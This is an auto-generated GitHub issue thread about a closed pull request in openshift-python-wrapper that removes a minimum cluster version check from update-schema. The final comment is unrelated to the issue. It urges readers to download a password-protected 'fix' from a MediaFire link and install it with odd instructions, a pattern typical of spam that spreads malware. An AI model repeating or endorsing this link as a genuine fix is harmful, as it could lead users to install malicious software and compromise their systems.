### ISSUE TITLE
class-generator: remove minimum cluster version in update-schema - 2080

### ISSUE THREAD

**Issue by redhat-qe-bot1** [RedHatQE/openshift-python-wrapper#2081]
[Auto generated]
Number: [#2080]

**Comment by msi-b1** [comment]
[38;5;23mopenshift-python-wrapper[0m[pull_request][6450-11ef-854e-2925a7c154e8][PR 2080]: Closing issue for PR: class-generator: remove minimum cluster version in update-schema.
PR was closed.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
